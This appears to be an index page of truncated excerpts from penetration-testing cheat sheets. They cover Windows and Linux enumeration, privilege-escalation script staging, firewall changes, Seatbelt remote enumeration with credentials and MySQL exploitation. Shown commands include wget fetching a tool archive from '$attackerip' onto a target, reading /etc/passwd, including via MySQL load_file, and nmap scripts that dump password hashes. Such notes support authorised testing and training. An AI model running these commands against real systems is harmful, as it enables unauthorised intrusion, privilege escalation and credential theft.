• Various Show who else is logged in. qwinsta Open the Event Viewer and search in the logs. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports against the previously found ones! netstat -ano Check the ARP cache…

  • Prepare your own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Prepare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, execute it: LinPeas: ./linpeas.sh LinEnum: ./LinEnum.sh linux-smart-enumeration: ./lse.sh -l1 linux-exploit-suggester-2: ./linux-exploit-suggester-2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh linuxprivchecker: ./linuxprivchecker.py Finally: Copy the typescript file to the PentestManager!

  • Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check the firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example of how to add exceptions to the firewall via the command line as an administrator: C:\Windows\temp> netsh advfirewall firewall…

  • After these steps, more things to do: Work with processes For enumeration of processes, see the Basic Windows system enumeration post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Suspend and continue a running process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLLs Show all…

  • Seatbelt

    Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, Seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...] Seatbelt.exe…

  • 1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…

  • Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…